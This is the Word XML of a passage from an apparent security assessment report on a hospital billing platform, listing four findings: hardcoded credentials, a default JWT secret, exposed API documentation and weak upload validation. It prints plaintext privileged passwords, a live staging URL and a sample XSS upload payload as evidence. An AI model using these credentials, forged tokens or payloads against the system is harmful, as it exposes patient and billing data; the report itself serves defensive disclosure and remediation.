        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Detailed Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-01   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardcoded Credentials in Version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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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CRITICAL</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9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</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A07:2021 - Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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Repository Root / Git History</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The files setup_demo_accounts.py and create_superadmin.py, committed to the public GitHub repository, contain or directly reference plaintext credentials for all three privileged account roles: Admin (admin@testclinic.com / Password123), Super Admin (superadmin@hospitalbilling.com / SuperSecure123), and Doctor (doctor@gmail.com / Doctor123). Although recent commits have partially migrated to os.environ references, the original plaintext values remain permanently accessible via the Git commit history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An unauthenticated attacker can retrieve all three credential sets from the repository history without any authentication. This provides immediate full administrative access to all tenant data, billing records, and patient PII. The Super Admin account is particularly critical as it likely carries cross-tenant visibility across all registered clinics on the platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">setup_demo_accounts.py - Git history preserves:
  "admin_password": "Password123"
  "admin_email": "admin@testclinic.com"
create_superadmin.py - Git history preserves:
  superadmin@hospitalbilling.com / SuperSecure123
  doctor@gmail.com / Doctor123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately rotate all three compromised account credentials. Use git-filter-repo to purge all credential data from every branch and tag in the repository history. Add pre-commit hooks (detect-secrets, truffleHog) to prevent future credential commits. Enable GitHub Secret Scanning. Ensure all scripts use os.environ exclusively with no hardcoded fallbacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-02   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Secret Default Fallback Value in Source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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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CRITICAL</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9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)</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A02:2021 - Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">VERIFIED OPEN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backend/app/core/config.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The Settings class in backend/app/core/config.py defines the JWT_SECRET_KEY field with a hardcoded fallback value of "change-this-in-production". If the application is ever deployed without the corresponding environment variable set - such as during a disaster recovery event, a new environment spin-up, or a CI/CD misconfiguration - the application will silently boot using this known, publicly visible secret without any error or warning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker with knowledge of the default secret can forge arbitrary JWT access tokens for any user account across any tenant using any standard JWT library. This constitutes a complete authentication bypass and full platform compromise, requiring no network access beyond a standard HTTPS connection to the API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/core/config.py:
  class Settings(BaseSettings):
    JWT_SECRET_KEY: str = "change-this-in-production"  # VULNERABLE DEFAULT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the default value entirely so the field reads: JWT_SECRET_KEY: str. Add a Pydantic validator enforcing a minimum length of 64 characters and rejecting known weak values. Add an application startup check that terminates the process if the secret is absent or does not meet the minimum strength requirement. Document this as a mandatory deployment prerequisite in the operations runbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D35400" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-03   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Swagger / OpenAPI UI Exposed on Staging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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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HIGH</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7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The FastAPI application exposes its auto-generated interactive API documentation at /docs (Swagger UI) and /redoc (ReDoc) without any authentication requirement. The staging environment is publicly internet-accessible, making this a zero-authentication full API enumeration capability available to any attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can use the Swagger UI to enumerate all API endpoints, understand data models including patient PII and billing structures, craft precise exploitation payloads, and bypass the need for prior reconnaissance entirely. The interactive "Try it out" functionality enables direct unauthenticated requests to be sent to the live API from within the documentation interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">GET https://hospital-billing-system-1.onrender.com/docs
  HTTP/1.1 200 OK
  Content-Type: text/html
  [Full interactive OpenAPI documentation rendered without authentication]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In backend/app/main.py, conditionally suppress documentation endpoints based on the APP_ENV variable. Set docs_url=None, redoc_url=None, and openapi_url=None for all environments where APP_ENV is not "development". This ensures /docs returns 404 on staging and production. Implement this as part of the FastAPI() constructor arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D35400" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-04   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bulk Upload - Insufficient File Validation (MIME Type Confusion)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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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HIGH</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7.2 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)</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A04:2021 - Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/tests.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload endpoint validates uploaded files using only the client-declared Content-Type header and file extension. Both of these controls are entirely user-controlled and can be trivially spoofed. No server-side magic-byte (file signature) validation is performed to confirm the actual binary content of the uploaded file matches its declared type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An authenticated attacker can upload a file with a .csv or .xlsx extension that contains malicious binary content. If the application stores files in a web-accessible directory, polyglot files - valid simultaneously as a CSV and an HTML or script file - could be served to other users and interpreted by their browsers as executable content, enabling stored XSS or Remote Code Execution scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1/tests/bulk-upload
  Content-Type: multipart/form-data
  filename: malicious.csv
  [File content: &lt;script&gt;alert(document.cookie)&lt;/script&gt; with CSV MIME declared]
  Response: HTTP 200 OK - file accepted and processed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
